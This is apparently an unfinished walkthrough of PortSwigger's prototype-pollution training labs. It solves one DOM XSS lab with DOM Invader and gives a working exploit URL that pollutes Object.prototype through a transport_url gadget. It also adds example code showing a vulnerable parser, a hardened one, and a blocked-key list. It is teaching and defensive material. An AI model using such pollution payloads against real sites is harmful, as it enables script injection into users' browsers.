IN PROGRESS: WebSecurityAcademy (PortSwigger) – Prototype pollution

Walk-through of the Prototype pollution labs on PortSwigger Web Security Academy. Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects.

Practitioner – DOM XSS via client-side prototype pollution

This lab is vulnerable to DOM XSS via client-side prototype pollution. You can solve this lab manually in your browser, or use DOM Invader to help you.

Find a source that you can use to add arbitrary properties to the global Object.prototype

Search for the term “whatever” and observe that the search term is displayed on the page.

  • Use DOM Invader:
    • Under Main settings, turn DOM Invader on.
    • Under Attack types, turn Prototype pollution on.
  • Right-click on the page and choose Inspect.
  • Click on the DOM Invader tab.

DOM Invader reports two findings:

Prototype pollution: __proto__[property]=value in search (1)
Prototype pollution: constructor[prototype][property]=value in search (1)

Identify a gadget property that allows you to execute arbitrary JavaScript

Still on the DOM Invader tab, click Scan for gadgets on the first finding (this opens a new tab). Nothing is found for it, so scan the second finding instead.

DOM Invader found 1 sink via prototype pollution.

Inspect the newly opened tab. Under its DOM Invader tab, we find the sink:

script.src (1)
<dom invader canari>2prototypepollutiontransport_url<dom invader canari>

Combine these to call alert()

Click Exploit. The generated URL carries a payload that calls the alert function:

https://<LAB ID>.web-security-academy.net/?search=whatever&constructor[prototype][transport_url]=data:,alert(1)
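To make the source-to-gadget chain above concrete, here is an added example (not code from the lab or from PortSwigger): a nested query-string parser of the kind such pages use, which is the assumed source; the gadget that copies an inherited transport_url into script.src; a hardened parser beside the vulnerable one; and a check for whether Object.prototype has been polluted. The function names parseQueryVulnerable, parseQuerySafe, buildScriptSrc, runVulnerable and runSafe are assumptions for this example, and each run deletes the polluted property afterwards so the global prototype is restored.

```javascript
// Added example; not the lab's own code. Models the lab's chain:
//   source  = query string parsed into nested objects without key checks
//   gadget  = config.transport_url read by code that never sets it itself

// Split "a=b=c" at the first "=" only, so values may contain "=".
function splitPair(pair) {
  const i = pair.indexOf('=');
  return i === -1 ? [pair, ''] : [pair.slice(0, i), pair.slice(i + 1)];
}

// "constructor[prototype][transport_url]" -> ["constructor", "prototype", "transport_url"]
function keyPath(key) {
  return key.split(/\]?\[|\]$/).filter(Boolean);
}

// VULNERABLE source (assumed parser): walks the bracket path and creates missing
// nodes, but never checks the keys. "__proto__" resolves to Object.prototype and
// "constructor" -> "prototype" reaches it too, so the final assignment pollutes it.
function parseQueryVulnerable(query) {
  const result = {};
  for (const pair of query.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const [rawKey, rawValue] = splitPair(pair);
    const path = keyPath(decodeURIComponent(rawKey));
    if (path.length === 0) continue;
    let node = result;
    for (let i = 0; i < path.length - 1; i++) {
      if (node[path[i]] === undefined) node[path[i]] = {}; // inherited values pass through
      node = node[path[i]];
    }
    node[path[path.length - 1]] = decodeURIComponent(rawValue);
  }
  return result;
}

// HARDENED parser: null-prototype objects (no chain to climb), own-property checks,
// and the prototype-pollution keys are dropped outright.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function parseQuerySafe(query) {
  const result = Object.create(null);
  for (const pair of query.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const [rawKey, rawValue] = splitPair(pair);
    const path = keyPath(decodeURIComponent(rawKey));
    if (path.length === 0 || path.some((k) => BLOCKED_KEYS.has(k))) continue;
    let node = result;
    for (let i = 0; i < path.length - 1; i++) {
      if (!Object.prototype.hasOwnProperty.call(node, path[i])) node[path[i]] = Object.create(null);
      node = node[path[i]];
    }
    node[path[path.length - 1]] = decodeURIComponent(rawValue);
  }
  return result;
}

// GADGET: the page only ever sets config.params, so a truthy config.transport_url
// can only come from the prototype chain. Returns the URL that would become script.src,
// or null when no script would be added.
function buildScriptSrc(config) {
  return config.transport_url ? config.transport_url : null;
}

// Detection check: has something added an own property to Object.prototype?
function isObjectPrototypePolluted(prop) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, prop);
}

function runWith(parser, query) {
  const config = { params: parser(query) };
  const outcome = {
    polluted: isObjectPrototypePolluted('transport_url'),
    scriptSrc: buildScriptSrc(config),
  };
  delete Object.prototype.transport_url; // restore the global prototype after the run
  return outcome;
}
const runVulnerable = (query) => runWith(parseQueryVulnerable, query);
const runSafe = (query) => runWith(parseQuerySafe, query);

// Usage with the lab's payload (the search term itself is harmless):
const LAB_QUERY = '?search=whatever&constructor[prototype][transport_url]=data:,alert(1)';
console.log(runVulnerable(LAB_QUERY)); // { polluted: true, scriptSrc: 'data:,alert(1)' }
console.log(runSafe(LAB_QUERY));       // { polluted: false, scriptSrc: null }
```

Both findings DOM Invader reported resolve to the same assignment: `result['__proto__']` is Object.prototype directly, and `result['constructor']['prototype']` reaches it through the Object function, which is why a key filter that only blocks `__proto__` is not enough and the hardened parser blocks `constructor` and `prototype` as well and builds null-prototype objects so there is no chain to climb in the first place.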

Practitioner – DOM XSS via an alternative prototype pollution vector

Practitioner – Client-side prototype pollution via flawed sanitization

Practitioner – Client-side prototype pollution in third-party libraries

Practitioner – Client-side prototype pollution via browser APIs

Practitioner – Privilege escalation via server-side prototype pollution

Practitioner – Detecting server-side prototype pollution without polluted property reflection

Practitioner – Bypassing flawed input filters for server-side prototype pollution

Practitioner – Remote code execution via server-side prototype pollution

Expert – Exfiltrating sensitive data via server-side prototype pollution